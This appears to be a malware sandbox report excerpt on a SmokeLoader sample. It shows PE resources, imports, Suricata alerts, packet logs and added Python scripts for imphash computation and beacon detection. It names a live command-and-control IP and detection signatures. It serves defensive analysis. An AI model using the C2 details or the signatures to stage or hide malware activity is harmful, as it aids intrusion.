RT_ICON | 0x61e18 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | Tamil | Sri Lanka | 0.5173545966228893
RT_ICON | 0x62ec0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | Tamil | India | 0.5004098360655738
RT_ICON | 0x62ec0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | Tamil | Sri Lanka | 0.5004098360655738
RT_ICON | 0x63848 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | Tamil | India | 0.5682624113475178
RT_ICON | 0x63848 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | Tamil | Sri Lanka | 0.5682624113475178
RT_DIALOG | 0x66148 | 0x58 | data | | | 0.8977272727272727
RT_STRING | 0x661a0 | 0x57a | data | Tamil | India | 0.42368045649072755
RT_STRING | 0x661a0 | 0x57a | data | Tamil | Sri Lanka | 0.42368045649072755
RT_STRING | 0x66720 | 0x2cc | data | Tamil | India | 0.473463687150838
RT_STRING | 0x66720 | 0x2cc | data | Tamil | Sri Lanka | 0.473463687150838
RT_STRING | 0x669f0 | 0x4ea | data | Tamil | India | 0.4507154213036566
RT_STRING | 0x669f0 | 0x4ea | data | Tamil | Sri Lanka | 0.4507154213036566
RT_ACCELERATOR | 0x63d28 | 0x48 | data | Tamil | India | 0.8472222222222222
RT_ACCELERATOR | 0x63d28 | 0x48 | data | Tamil | Sri Lanka | 0.8472222222222222
RT_GROUP_CURSOR | 0x641d0 | 0x22 | data | | | 1.0294117647058822
RT_GROUP_CURSOR | 0x65eb0 | 0x30 | data | | | 0.9375
RT_GROUP_ICON | 0x63cb0 | 0x76 | data | Tamil | India | 0.6610169491525424
RT_GROUP_ICON | 0x63cb0 | 0x76 | data | Tamil | Sri Lanka | 0.6610169491525424
RT_VERSION | 0x65ee0 | 0x264 | data | | | 0.5359477124183006
DLL | Import
KERNEL32.dll | GetComputerNameA, TlsGetValue, GetConsoleAliasExesA, CreateProcessW, ClearCommError, InterlockedIncrement, GetCurrentProcess, SetEnvironmentVariableW, SetComputerNameW, GetTickCount, CreateNamedPipeW, EnumTimeFormatsA, CreateActCtxW, GetCurrencyFormatW, GetEnvironmentStrings, SetFileShortNameW, GetLocaleInfoW, ReadConsoleInputA, SetVolumeMountPointA, GetVersionExW, GetTimeFormatW, GetFileAttributesW, GetModuleFileNameW, GetShortPathNameA, CreateJobObjectA, LCMapStringA, VerifyVersionInfoW, InterlockedExchange, GetLogicalDriveStringsA, GetLastError, SetLastError, GetProcAddress, VirtualAlloc, DefineDosDeviceA, GlobalFree, GetTempFileNameA, LoadLibraryA, CreateSemaphoreW, InterlockedExchangeAdd, GetNumberFormatW, OpenEventA, GetCommMask, OpenJobObjectW, GetModuleFileNameA, GlobalUnWire, GetCurrentDirectoryA, GetShortPathNameW, GetDiskFreeSpaceExA, SetFileAttributesW, CommConfigDialogW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, HeapReAlloc, HeapAlloc, GetStartupInfoW, RaiseException, RtlUnwind, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetStdHandle, TerminateProcess, IsDebuggerPresent, HeapFree, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, HeapCreate, VirtualFree, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, InterlockedDecrement, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, WideCharToMultiByte, HeapSize, GetLocaleInfoA, GetModuleHandleA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, CloseHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetStdHandle, CreateFileA
USER32.dll | GetAltTabInfoW
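The Import Hash given above is an imphash: an MD5 over the lower-cased dll.function pairs in import-table order, so it pivots on the layout of the import table rather than on file bytes. The function below is an added example, not Joe Sandbox or pefile code; it computes the hash in that convention over the two DLLs listed here. Whether it reproduces the report's value depends on the listing above preserving the original table order, which is not asserted. Worth reading alongside it is what the table actually contains: the usual MSVC 2008 CRT start-up set (HeapCreate, GetStartupInfoW, InitializeCriticalSectionAndSpinCount and friends) plus a scatter of rarely used KERNEL32 APIs (GlobalUnWire, SetVolumeMountPointA, CommConfigDialogW, GetConsoleAliasExesA) and a single USER32 import. With GetProcAddress and LoadLibraryA present, the API set the loader really uses can be resolved at runtime, so this imphash identifies the crypter stub, not the SmokeLoader payload, and clusters with other builds of the same stub rather than with other SmokeLoader samples.

```python
import hashlib

# Import table as listed in the report, in the order shown (assumed to be table order).
KERNEL32_IMPORTS = (
    "GetComputerNameA, TlsGetValue, GetConsoleAliasExesA, CreateProcessW, ClearCommError, "
    "InterlockedIncrement, GetCurrentProcess, SetEnvironmentVariableW, SetComputerNameW, GetTickCount, "
    "CreateNamedPipeW, EnumTimeFormatsA, CreateActCtxW, GetCurrencyFormatW, GetEnvironmentStrings, "
    "SetFileShortNameW, GetLocaleInfoW, ReadConsoleInputA, SetVolumeMountPointA, GetVersionExW, "
    "GetTimeFormatW, GetFileAttributesW, GetModuleFileNameW, GetShortPathNameA, CreateJobObjectA, "
    "LCMapStringA, VerifyVersionInfoW, InterlockedExchange, GetLogicalDriveStringsA, GetLastError, "
    "SetLastError, GetProcAddress, VirtualAlloc, DefineDosDeviceA, GlobalFree, GetTempFileNameA, "
    "LoadLibraryA, CreateSemaphoreW, InterlockedExchangeAdd, GetNumberFormatW, OpenEventA, GetCommMask, "
    "OpenJobObjectW, GetModuleFileNameA, GlobalUnWire, GetCurrentDirectoryA, GetShortPathNameW, "
    "GetDiskFreeSpaceExA, SetFileAttributesW, CommConfigDialogW, UnhandledExceptionFilter, "
    "SetUnhandledExceptionFilter, HeapReAlloc, HeapAlloc, GetStartupInfoW, RaiseException, RtlUnwind, "
    "GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetStdHandle, TerminateProcess, IsDebuggerPresent, "
    "HeapFree, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, HeapCreate, VirtualFree, "
    "FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, "
    "GetStartupInfoA, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, InterlockedDecrement, "
    "QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, "
    "InitializeCriticalSectionAndSpinCount, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, "
    "WideCharToMultiByte, HeapSize, GetLocaleInfoA, GetModuleHandleA, MultiByteToWideChar, LCMapStringW, "
    "GetStringTypeA, GetStringTypeW, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, "
    "CloseHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetStdHandle, CreateFileA"
).split(", ")

SAMPLE_IMPORTS = [
    ("KERNEL32.dll", KERNEL32_IMPORTS),
    ("USER32.dll", ["GetAltTabInfoW"]),
]


def imphash(imports) -> tuple:
    """Import hash in the pefile convention.

    imports: [(dll_name, [function name or ordinal int, ...]), ...] in import-table order.
    Each entry becomes 'dll.func' lower-cased, with a .dll/.ocx/.sys extension stripped
    and ordinals written as 'ordN'; the comma-joined list is MD5-hashed.
    Returns (hex digest, normalised entry list)."""
    parts = []
    for dll, funcs in imports:
        lib = dll.lower()
        base, dot, ext = lib.rpartition(".")
        if dot and ext in ("dll", "ocx", "sys"):
            lib = base
        for f in funcs:
            name = f"ord{f}" if isinstance(f, int) else f.lower()
            parts.append(f"{lib}.{name}")
    return hashlib.md5(",".join(parts).encode("ascii")).hexdigest(), parts


if __name__ == "__main__":
    digest, entries = imphash(SAMPLE_IMPORTS)
    print(digest, len(entries), "entries")
```

Because the hash runs over the ordered list, reordering the same functions changes it, while casing of DLL or function names does not; the test below checks both properties rather than the digest value itself.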
Language of compilation system | Country where language is spoken
Tamil | India
Tamil | Sri Lanka
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-20T09:38:55.064900+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 55686 | 211.171.233.126 | 80 | TCP
2024-10-20T09:39:16.001247+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 55718 | 211.171.233.126 | 80 | TCP
2024-10-20T09:39:33.091816+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 55719 | 211.171.233.126 | 80 | TCP
2024-10-20T09:39:57.293501+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 55720 | 211.171.233.126 | 80 | TCP
2024-10-20T09:40:22.237445+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 54853 | 211.171.233.126 | 80 | TCP
2024-10-20T09:40:43.105564+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.4 | 54854 | 211.171.233.126 | 80 | TCP
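Six hits on SID 2039103 in under two minutes, each on a fresh source port and 17 to 25 seconds apart: that is the loader's check-in loop to 211.171.233.126, and the regularity, not any single POST, is what a detection should key on. The script below is an added example, not Joe Sandbox or Suricata code. It regroups the alert rows above (embedded as constructed tuples with the same values) per source, destination, port and SID, computes the gaps between consecutive hits, and flags the group as beaconing when the coefficient of variation of the gaps is low. The thresholds (at least four hits, CV at most 0.35) are assumptions to tune against your own traffic.

```python
from datetime import datetime
from statistics import mean, pstdev

# The six alert rows from the table above: (timestamp, SID, src IP, src port, dst IP, dst port).
ALERTS = [
    ("2024-10-20T09:38:55.064900+0200", 2039103, "192.168.2.4", 55686, "211.171.233.126", 80),
    ("2024-10-20T09:39:16.001247+0200", 2039103, "192.168.2.4", 55718, "211.171.233.126", 80),
    ("2024-10-20T09:39:33.091816+0200", 2039103, "192.168.2.4", 55719, "211.171.233.126", 80),
    ("2024-10-20T09:39:57.293501+0200", 2039103, "192.168.2.4", 55720, "211.171.233.126", 80),
    ("2024-10-20T09:40:22.237445+0200", 2039103, "192.168.2.4", 54853, "211.171.233.126", 80),
    ("2024-10-20T09:40:43.105564+0200", 2039103, "192.168.2.4", 54854, "211.171.233.126", 80),
]


def parse_ts(s: str) -> datetime:
    """Suricata-style timestamp with microseconds and a +HHMM offset."""
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%S.%f%z")


def beacon_stats(alerts, min_hits: int = 4, max_cv: float = 0.35) -> dict:
    """Group alerts per (src, dst, dport, sid) and score the regularity of their timing.

    Returns, per group: hit count, the inter-hit gaps in seconds, mean gap, coefficient of
    variation (stdev / mean) and a 'beacon' verdict. The source port is deliberately left
    out of the key because each check-in opens a new ephemeral connection."""
    groups = {}
    for ts, sid, src, _sport, dst, dport in alerts:
        groups.setdefault((src, dst, dport, sid), []).append(parse_ts(ts))
    out = {}
    for key, times in groups.items():
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        stats = {"hits": len(times), "gaps": gaps, "mean_gap": None, "cv": None, "beacon": False}
        if len(times) >= min_hits:
            m = mean(gaps)
            cv = pstdev(gaps) / m if m > 0 else float("inf")
            stats.update(mean_gap=m, cv=cv, beacon=cv <= max_cv)
        out[key] = stats
    return out


if __name__ == "__main__":
    for key, st in beacon_stats(ALERTS).items():
        print(key, f"hits={st['hits']} mean_gap={st['mean_gap']:.1f}s cv={st['cv']:.2f} beacon={st['beacon']}")
```

On this data the mean gap is about 21.6 s with a CV of roughly 0.13, comfortably inside the threshold. Keying the group on destination and SID rather than on the 5-tuple is the point: every check-in here is a new short-lived TCP connection, so per-connection logic never sees the pattern.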
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 20, 2024 09:38:53.863775969 CEST | 55686 | 80 | 192.168.2.4 | 211.171.233.126
Oct 20, 2024 09:38:53.868602991 CEST | 80 | 55686 | 211.171.233.126 | 192.168.2.4
Oct 20, 2024 09:38:53.868773937 CEST | 55686 | 80 | 192.168.2.4 | 211.171.233.126
Oct 20, 2024 09:38:53.869266987 CEST | 55686 | 80 | 192.168.2.4 | 211.171.233.126
Oct 20, 2024 09:38:53.869303942 CEST | 55686 | 80 | 192.168.2.4 | 211.171.233.126
Oct 20, 2024 09:38:53.874066114 CEST | 80 | 55686 | 211.171.233.126 | 192.168.2.4
Oct 20, 2024 09:38:53.874205112 CEST | 80 | 55686 | 211.171.233.126 | 192.168.2.4
Oct 20, 2024 09:38:55.064829111 CEST | 80 | 55686 | 211.171.233.126 | 192.168.2.4
Oct 20, 2024 09:38:55.064899921 CEST | 55686 | 80 | 192.168.2.4 | 211.171.233.126
Oct 20, 2024 09:38:55.064965010 CEST | 55686 | 80 | 192.168.2.4 | 211.171.233.126
Oct 20, 2024 09:38:55.069853067 CEST | 80 | 55686 | 211.171.233.126 | 192.168.2.4
Oct 20, 2024 09:39:14.789788008 CEST | 55718 | 80 | 192.168.2.4 | 211.171.233.126
Oct 20, 2024 09:39:14.794790030 CEST | 80 | 55718 | 211.171.233.126 | 192.168.2.4
Oct 20, 2024 09:39:14.794900894 CEST | 55718 | 80 | 192.168.2.4 | 211.171.233.126
Oct 20, 2024 09:39:14.795099974 CEST | 55718 | 80 | 192.168.2.4 | 211.171.233.126
Oct 20, 2024 09:39:14.795286894 CEST | 55718 | 80 | 192.168.2.4 | 211.171.233.126
Oct 20, 2024 09:39:14.799910069 CEST | 80 | 55718 | 211.171.233.126 | 192.168.2.4
Oct 20, 2024 09:39:14.800055027 CEST | 80 | 55718 | 211.171.233.126 | 192.168.2.4
Oct 20, 2024 09:39:16.000078917 CEST | 80 | 55718 | 211.171.233.126 | 192.168.2.4
Oct 20, 2024 09:39:16.001246929 CEST | 55718 | 80 | 192.168.2.4 | 211.171.233.126
Oct 20, 2024 09:39:16.001317978 CEST | 55718 | 80 | 192.168.2.4 | 211.171.233.126
Oct 20, 2024 09:39:16.006119013 CEST | 80 | 55718 | 211.171.233.126 | 192.168.2.4
Oct 20, 2024 09:39:31.905277014 CEST | 55719 | 80 | 192.168.2.4 | 211.171.233.126
Oct 20, 2024 09:39:31.910216093 CEST | 80 | 55719 | 211.171.233.126 | 192.168.2.4
Oct 20, 2024 09:39:31.911501884 CEST | 55719 | 80 | 192.168.2.4 | 211.171.233.126
Oct 20, 2024 09:39:31.911593914 CEST | 55719 | 80 | 192.168.2.4 | 211.171.233.126
Oct 20, 2024 09:39:31.911611080 CEST | 55719 | 80 | 192.168.2.4 | 211.171.233.126
Oct 20, 2024 09:39:31.916490078 CEST | 80 | 55719 | 211.171.233.126 | 192.168.2.4
Oct 20, 2024 09:39:31.916512012 CEST | 80 | 55719 | 211.171.233.126 | 192.168.2.4
Oct 20, 2024 09:39:33.091749907 CEST | 80 | 55719 | 211.171.233.126 | 192.168.2.4
Oct 20, 2024 09:39:33.091815948 CEST | 55719 | 80 | 192.168.2.4 | 211.171.233.126
Oct 20, 2024 09:39:33.091866016 CEST | 55719 | 80 | 192.168.2.4 | 211.171.233.126
Oct 20, 2024 09:39:33.096693039 CEST | 80 | 55719 | 211.171.233.126 | 192.168.2.4
Oct 20, 2024 09:39:56.127829075 CEST | 55720 | 80 | 192.168.2.4 | 211.171.233.126
Oct 20, 2024 09:39:56.132867098 CEST | 80 | 55720 | 211.171.233.126 | 192.168.2.4
Oct 20, 2024 09:39:56.133037090 CEST | 55720 | 80 | 192.168.2.4 | 211.171.233.126
Oct 20, 2024 09:39:56.133203030 CEST | 55720 | 80 | 192.168.2.4 | 211.171.233.126
Oct 20, 2024 09:39:56.133219004 CEST | 55720 | 80 | 192.168.2.4 | 211.171.233.126
Oct 20, 2024 09:39:56.138170958 CEST | 80 | 55720 | 211.171.233.126 | 192.168.2.4
Oct 20, 2024 09:39:56.138183117 CEST | 80 | 55720 | 211.171.233.126 | 192.168.2.4
Oct 20, 2024 09:39:57.289772987 CEST | 80 | 55720 | 211.171.233.126 | 192.168.2.4
Oct 20, 2024 09:39:57.293500900 CEST | 55720 | 80 | 192.168.2.4 | 211.171.233.126
Oct 20, 2024 09:39:57.293502092 CEST | 55720 | 80 | 192.168.2.4 | 211.171.233.126
Oct 20, 2024 09:39:57.298705101 CEST | 80 | 55720 | 211.171.233.126 | 192.168.2.4
Oct 20, 2024 09:40:21.071033001 CEST | 54853 | 80 | 192.168.2.4 | 211.171.233.126
Oct 20, 2024 09:40:21.077368975 CEST | 80 | 54853 | 211.171.233.126 | 192.168.2.4
Oct 20, 2024 09:40:21.077462912 CEST | 54853 | 80 | 192.168.2.4 | 211.171.233.126
Oct 20, 2024 09:40:21.077653885 CEST | 54853 | 80 | 192.168.2.4 | 211.171.233.126
Oct 20, 2024 09:40:21.077682972 CEST | 54853 | 80 | 192.168.2.4 | 211.171.233.126
Oct 20, 2024 09:40:21.082524061 CEST | 80 | 54853 | 211.171.233.126 | 192.168.2.4
Oct 20, 2024 09:40:21.082588911 CEST | 80 | 54853 | 211.171.233.126 | 192.168.2.4
Oct 20, 2024 09:40:22.237370014 CEST | 80 | 54853 | 211.171.233.126 | 192.168.2.4
Oct 20, 2024 09:40:22.237445116 CEST | 54853 | 80 | 192.168.2.4 | 211.171.233.126
Oct 20, 2024 09:40:22.237498999 CEST | 54853 | 80 | 192.168.2.4 | 211.171.233.126
Oct 20, 2024 09:40:22.243139029 CEST | 80 | 54853 | 211.171.233.126 | 192.168.2.4
Oct 20, 2024 09:40:41.907824039 CEST | 54854 | 80 | 192.168.2.4 | 211.171.233.126
Oct 20, 2024 09:40:41.912914038 CEST | 80 | 54854 | 211.171.233.126 | 192.168.2.4
Oct 20, 2024 09:40:41.912995100 CEST | 54854 | 80 | 192.168.2.4 | 211.171.233.126
Oct 20, 2024 09:40:41.913100004 CEST | 54854 | 80 | 192.168.2.4 | 211.171.233.126
Oct 20, 2024 09:40:41.913130045 CEST | 54854 | 80 | 192.168.2.4 | 211.171.233.126
Oct 20, 2024 09:40:41.917915106 CEST | 80 | 54854 | 211.171.233.126 | 192.168.2.4
Oct 20, 2024 09:40:41.918102980 CEST | 80 | 54854 | 211.171.233.126 | 192.168.2.4
Oct 20, 2024 09:40:43.105464935 CEST | 80 | 54854 | 211.171.233.126 | 192.168.2.4
Oct 20, 2024 09:40:43.105564117 CEST | 54854 | 80 | 192.168.2.4 | 211.171.233.126
Oct 20, 2024 09:40:43.106950998 CEST | 54854 | 80 | 192.168.2.4 | 211.171.233.126
Oct 20, 2024 09:40:43.111843109 CEST | 80 | 54854 | 211.171.233.126 | 192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 20, 2024 09:37:23.464411974 CEST | 63831 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:37:24.477906942 CEST | 63831 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:37:25.493490934 CEST | 63831 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:37:27.508902073 CEST | 63831 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:37:27.701919079 CEST | 53 | 63831 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:37:27.701935053 CEST | 53 | 63831 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:37:27.701941013 CEST | 53 | 63831 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:37:27.701946020 CEST | 53 | 63831 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:37:27.705244064 CEST | 54856 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:37:28.712131023 CEST | 54856 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:37:29.712110996 CEST | 54856 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:37:31.727678061 CEST | 54856 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:37:35.727746964 CEST | 54856 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:37:37.214426041 CEST | 53 | 54856 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:37:37.214464903 CEST | 53 | 54856 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:37:37.214497089 CEST | 53 | 54856 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:37:37.214525938 CEST | 53 | 54856 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:37:37.214561939 CEST | 53 | 54856 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:37:37.217175007 CEST | 52899 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:37:37.226423025 CEST | 53 | 52899 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:37:37.228619099 CEST | 59508 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:37:38.227806091 CEST | 59508 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:37:38.234502077 CEST | 53 | 59508 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:37:45.312041044 CEST | 53 | 59508 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:38:51.331573009 CEST | 51992 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:38:52.337474108 CEST | 51992 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:38:53.337481976 CEST | 51992 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:38:53.862907887 CEST | 53 | 51992 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:38:53.862921953 CEST | 53 | 51992 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:38:53.862989902 CEST | 53 | 51992 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:38:55.068178892 CEST | 64564 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:38:56.071932077 CEST | 64564 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:38:57.081801891 CEST | 64564 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:38:59.087507010 CEST | 64564 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:39:02.967356920 CEST | 53 | 64564 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:39:02.967367887 CEST | 53 | 64564 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:39:02.967375994 CEST | 53 | 64564 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:39:02.967389107 CEST | 53 | 64564 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:39:02.972198963 CEST | 60541 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:39:02.981376886 CEST | 53 | 60541 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:39:02.985948086 CEST | 50035 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:39:03.994590998 CEST | 50035 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:39:05.008824110 CEST | 50035 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:39:07.000643969 CEST | 50035 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:39:10.781418085 CEST | 53 | 50035 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:39:10.781434059 CEST | 53 | 50035 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:39:10.781441927 CEST | 53 | 50035 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:39:10.781451941 CEST | 53 | 50035 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:39:16.004688978 CEST | 56440 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:39:17.009521961 CEST | 56440 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:39:18.009525061 CEST | 56440 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:39:20.009536982 CEST | 56440 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:39:20.848484993 CEST | 53 | 56440 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:39:20.848506927 CEST | 53 | 56440 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:39:20.848520041 CEST | 53 | 56440 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:39:20.848531961 CEST | 53 | 56440 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:39:20.864247084 CEST | 51211 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:39:20.873393059 CEST | 53 | 51211 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:39:20.882436991 CEST | 54723 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:39:21.874319077 CEST | 54723 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:39:22.891041994 CEST | 54723 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:39:24.885687113 CEST | 54723 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:39:27.918654919 CEST | 53 | 54723 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:39:27.918673038 CEST | 53 | 54723 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:39:27.918683052 CEST | 53 | 54723 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:39:27.918694019 CEST | 53 | 54723 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:39:33.099148035 CEST | 53040 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:39:34.087735891 CEST | 53040 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:39:35.103343964 CEST | 53040 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:39:37.118973970 CEST | 53040 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:39:41.121043921 CEST | 53040 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:39:42.128823996 CEST | 53 | 53040 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:39:42.128842115 CEST | 53 | 53040 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:39:42.128850937 CEST | 53 | 53040 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:39:42.128863096 CEST | 53 | 53040 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:39:42.128931046 CEST | 53 | 53040 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:39:42.144233942 CEST | 51193 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:39:42.153511047 CEST | 53 | 51193 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:39:42.158812046 CEST | 62529 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:39:43.166395903 CEST | 62529 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:39:44.170075893 CEST | 62529 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:39:46.166450024 CEST | 62529 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:39:50.182689905 CEST | 62529 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:39:51.006125927 CEST | 53 | 62529 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:39:51.006141901 CEST | 53 | 62529 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:39:51.006150961 CEST | 53 | 62529 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:39:51.006161928 CEST | 53 | 62529 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:39:51.006165981 CEST | 53 | 62529 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:39:57.297740936 CEST | 52296 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:39:58.291162968 CEST | 52296 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:39:59.306598902 CEST | 52296 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:40:01.306811094 CEST | 52296 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:40:05.261745930 CEST | 53 | 52296 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:40:05.261797905 CEST | 53 | 52296 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:40:05.261809111 CEST | 53 | 52296 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:40:05.261816978 CEST | 53 | 52296 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:40:05.276205063 CEST | 50586 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:40:05.288279057 CEST | 53 | 50586 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:40:05.302545071 CEST | 62550 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:40:06.290985107 CEST | 62550 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:40:07.290999889 CEST | 62550 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:40:07.298880100 CEST | 53 | 62550 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:40:13.759941101 CEST | 53 | 62550 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:40:13.759958029 CEST | 53 | 62550 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:40:22.245542049 CEST | 56660 | 53 | 192.168.2.4 | 1.1.1.1
